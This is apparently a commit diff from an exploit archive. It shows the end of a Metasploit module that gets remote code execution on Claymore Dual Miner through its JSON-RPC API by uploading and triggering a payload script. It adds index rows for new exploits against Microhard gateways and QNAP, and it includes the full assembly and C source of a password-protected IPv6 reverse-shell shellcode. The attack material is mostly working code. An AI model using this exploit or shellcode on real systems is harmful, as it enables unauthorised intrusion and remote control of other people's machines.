|
case target['Platform']
|
||||||
|
when 'linux'
|
||||||
|
cmd = Rex::Text.to_hex(cmd, '')
|
||||||
|
upload = {
|
||||||
|
"id" => 0,
|
||||||
|
"jsonrpc" => '2.0',
|
||||||
|
"method" => 'miner_file',
|
||||||
|
"params" => ['reboot.bash', "#{cmd}"]
|
||||||
|
}.to_json
|
||||||
|
when 'windows'
|
||||||
|
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
|
||||||
|
upload = {
|
||||||
|
"id" => 0,
|
||||||
|
"jsonrpc" => '2.0',
|
||||||
|
"method" => 'miner_file',
|
||||||
|
"params" => ['reboot.bat', "#{cmd}"]
|
||||||
|
}.to_json
|
||||||
|
end
|
||||||
|
|
||||||
|
connect
|
||||||
|
sock.put(upload)
|
||||||
|
buf = sock.get_once || ''
|
||||||
|
trigger_vulnerability
|
||||||
|
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||||
|
fail_with(Failure::UnexpectedReply, e.message)
|
||||||
|
ensure
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
|
|
||||||
|
def trigger_vulnerability
|
||||||
|
execute = {
|
||||||
|
"id" => 0,
|
||||||
|
"jsonrpc" => '2.0',
|
||||||
|
"method" => 'miner_reboot'
|
||||||
|
}.to_json
|
||||||
|
connect
|
||||||
|
sock.put(execute)
|
||||||
|
buf = sock.get_once || ''
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
target = select_target
|
||||||
|
if target.nil?
|
||||||
|
fail_with(Failure::NoTarget, 'No matching target')
|
||||||
|
end
|
||||||
|
if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
|
||||||
|
(target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)
|
||||||
|
fail_with(Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'")
|
||||||
|
end
|
||||||
|
case target['Platform']
|
||||||
|
when 'linux'
|
||||||
|
execute_cmdstager(flavor: :echo, linemax: 100000)
|
||||||
|
when 'windows'
|
||||||
|
execute_cmdstager(flavor: :vbs, linemax: 100000)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
|
@ -6018,7 +6018,7 @@ id,file,description,date,author,type,platform,port
|
||||||
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
|
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
|
||||||
45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows,
|
45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows,
|
||||||
45032,exploits/multiple/dos/45032.txt,"macOS/iOS - JavaScript Injection Bug in OfficeImporter",2018-07-16,"Google Security Research",dos,multiple,
|
45032,exploits/multiple/dos/45032.txt,"macOS/iOS - JavaScript Injection Bug in OfficeImporter",2018-07-16,"Google Security Research",dos,multiple,
|
||||||
45033,exploits/linux/dos/45033.c,"Linux/Ubuntu - Other Users coredumps can be read via setgid Directory and killpriv Bypass",2018-07-16,"Google Security Research",dos,linux,
|
45033,exploits/linux/dos/45033.c,"Linux (Ubuntu) - Other Users coredumps Can Be Read via setgid Directory and killpriv Bypass",2018-07-16,"Google Security Research",dos,linux,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -9817,6 +9817,7 @@ id,file,description,date,author,type,platform,port
|
||||||
45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
|
45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
|
||||||
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
|
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
|
||||||
45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
|
45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
|
||||||
|
45041,exploits/hardware/local/45041.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape",2018-07-17,LiquidWorm,local,hardware,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -16622,6 +16623,9 @@ id,file,description,date,author,type,platform,port
|
||||||
45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984
|
45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984
|
||||||
45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
|
45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
|
||||||
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
|
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
|
||||||
|
45040,exploits/hardware/remote/45040.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials",2018-07-17,LiquidWorm,remote,hardware,
|
||||||
|
45043,exploits/linux/remote/45043.rb,"QNAP Q'Center - change_passwd Command Execution (Metasploit)",2018-07-17,Metasploit,remote,linux,443
|
||||||
|
45044,exploits/multiple/remote/45044.rb,"Nanopool Claymore Dual Miner - APIs RCE (Metasploit)",2018-07-17,Metasploit,remote,multiple,3333
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
@ -39666,3 +39670,8 @@ id,file,description,date,author,type,platform,port
|
||||||
45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,
|
45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,
|
||||||
45027,exploits/java/webapps/45027.txt,"Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection",2018-07-16,alt3kx,webapps,java,
|
45027,exploits/java/webapps/45027.txt,"Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection",2018-07-16,alt3kx,webapps,java,
|
||||||
45031,exploits/php/webapps/45031.txt,"WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting",2018-07-16,"Berk Dusunur",webapps,php,
|
45031,exploits/php/webapps/45031.txt,"WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting",2018-07-16,"Berk Dusunur",webapps,php,
|
||||||
|
45034,exploits/hardware/webapps/45034.html,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery",2018-07-17,LiquidWorm,webapps,hardware,80
|
||||||
|
45035,exploits/hardware/webapps/45035.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service",2018-07-17,LiquidWorm,webapps,hardware,
|
||||||
|
45036,exploits/hardware/webapps/45036.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download",2018-07-17,LiquidWorm,webapps,hardware,
|
||||||
|
45037,exploits/hardware/webapps/45037.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation",2018-07-17,LiquidWorm,webapps,hardware,
|
||||||
|
45038,exploits/hardware/webapps/45038.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root",2018-07-17,LiquidWorm,webapps,hardware,
|
||||||
|
|
Can't render this file because it is too large.
|
|
@ -895,3 +895,4 @@ id,file,description,date,author,type,platform
|
||||||
44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
|
44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
|
||||||
44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
|
44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
|
||||||
45029,shellcodes/arm/45029.c,"Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2018-07-16,odzhancode,shellcode,arm
|
45029,shellcodes/arm/45029.c,"Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2018-07-16,odzhancode,shellcode,arm
|
||||||
|
45039,shellcodes/linux_x86-64/45039.c,"Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)",2018-07-17,"Hashim Jawad",shellcode,linux_x86-64
|
||||||
|
|
|
115
shellcodes/linux_x86-64/45039.c
Normal file
115
shellcodes/linux_x86-64/45039.c
Normal file
|
@ -0,0 +1,115 @@
|
||||||
|
/*
|
||||||
|
; Title : Reverse Shell (IPv6) with Password - Shellcode
|
||||||
|
; Author : Hashim Jawad @ihack4falafel
|
||||||
|
; OS : Linux kali 4.15.0-kali2-amd64 #1 SMP Debian 4.15.11-1kali1 (2018-03-21) x86_64 GNU/Linux
|
||||||
|
; Arch : x86_64
|
||||||
|
; Size : 115 bytes
|
||||||
|
|
||||||
|
section .text
|
||||||
|
|
||||||
|
global _start
|
||||||
|
|
||||||
|
_start:
|
||||||
|
|
||||||
|
; int socket(int domain, int type, int protocol)
|
||||||
|
; rax=41, rdi=10, rsi=1, rdx=0
|
||||||
|
xor esi,esi
|
||||||
|
mul esi
|
||||||
|
inc esi
|
||||||
|
push 10
|
||||||
|
pop rdi
|
||||||
|
add al, 41
|
||||||
|
syscall
|
||||||
|
|
||||||
|
; save socket fd in rdi
|
||||||
|
xchg rbx,rax
|
||||||
|
|
||||||
|
; struct sockaddr_in6 struct
|
||||||
|
push rdx ; scope id = 0
|
||||||
|
mov rcx,0xFEFFFFFFFFFFFFFF ; link local address ::1
|
||||||
|
not rcx
|
||||||
|
push rcx
|
||||||
|
push rdx
|
||||||
|
push rdx ; sin6_flowinfo=0
|
||||||
|
push word 0x3905 ; port 1337
|
||||||
|
push word 10 ; sin6_family
|
||||||
|
|
||||||
|
; int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen)
|
||||||
|
; rax=42, rdi=rbx(fd), rsi=sockaddr_inet6, rdx=28 (length)
|
||||||
|
push rbx
|
||||||
|
pop rdi
|
||||||
|
push rsp
|
||||||
|
pop rsi
|
||||||
|
push 28
|
||||||
|
pop rdx
|
||||||
|
push 42
|
||||||
|
pop rax
|
||||||
|
syscall
|
||||||
|
|
||||||
|
; dup2 (new, old)
|
||||||
|
; rax=33, rdi=new fd, rsi=0,1,2 (stdin, stdout, stderr)
|
||||||
|
xchg rsi, rax
|
||||||
|
push 0x3
|
||||||
|
pop rsi
|
||||||
|
_loop:
|
||||||
|
push 0x21
|
||||||
|
pop rax
|
||||||
|
dec esi
|
||||||
|
syscall
|
||||||
|
loopnz _loop
|
||||||
|
|
||||||
|
; read (int fd, void *bf, size_t count)
|
||||||
|
; rax=0, rdi=0 (stdin), rsi=rsp, rdx=4 (pwnd)
|
||||||
|
xor rax, rax
|
||||||
|
push rax
|
||||||
|
pop rdi
|
||||||
|
push rax
|
||||||
|
push rsp
|
||||||
|
pop rsi
|
||||||
|
push 0x4
|
||||||
|
pop rdx
|
||||||
|
syscall
|
||||||
|
|
||||||
|
; check passcode (pwnd)
|
||||||
|
push 0x646e7770
|
||||||
|
pop rbx
|
||||||
|
cmp dword [rsi], ebx
|
||||||
|
jne _nop
|
||||||
|
|
||||||
|
; int execve(cont char *filename, char *const argv[], char *const envp[])
|
||||||
|
; rax=59, rdi=/bin//sh, rsi=0, rdx=0
|
||||||
|
xor rax, rax
|
||||||
|
push rax
|
||||||
|
mov rbx, 0x68732f2f6e69622f
|
||||||
|
push rbx
|
||||||
|
push rsp
|
||||||
|
pop rdi
|
||||||
|
push rax
|
||||||
|
push rsp
|
||||||
|
pop rsi
|
||||||
|
cdq
|
||||||
|
push 0x3b
|
||||||
|
pop rax
|
||||||
|
syscall
|
||||||
|
|
||||||
|
_nop:
|
||||||
|
nop
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include<stdio.h>
|
||||||
|
#include<string.h>
|
||||||
|
|
||||||
|
|
||||||
|
unsigned char code[] = \
|
||||||
|
"\x31\xf6\xf7\xe6\xff\xc6\x6a\x0a\x5f\x04\x29\x0f\x05\x48\x93\x52\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xfe\x48\xf7\xd1\x51\x52\x52\x66\x68\x05\x39\x66\x6a\x0a\x53\x5f\x54\x5e\x6a\x1c\x5a\x6a\x2a\x58\x0f\x05\x48\x96\x6a\x03\x5e\x6a\x21\x58\xff\xce\x0f\x05\xe0\xf7\x48\x31\xc0\x50\x5f\x50\x54\x5e\x6a\x04\x5a\x0f\x05\x68\x70\x77\x6e\x64\x5b\x39\x1e\x75\x1a\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x50\x54\x5e\x99\x6a\x3b\x58\x0f\x05\x90";
|
||||||
|
|
||||||
|
main()
|
||||||
|
{
|
||||||
|
|
||||||
|
printf("Shellcode Length: %d\n", (int)strlen(code));
|
||||||
|
|
||||||
|
int (*ret)() = (int(*)())code;
|
||||||
|
|
||||||
|
ret();
|
||||||
|
|
||||||
|
}
|
Loading…
Add table
Reference in a new issue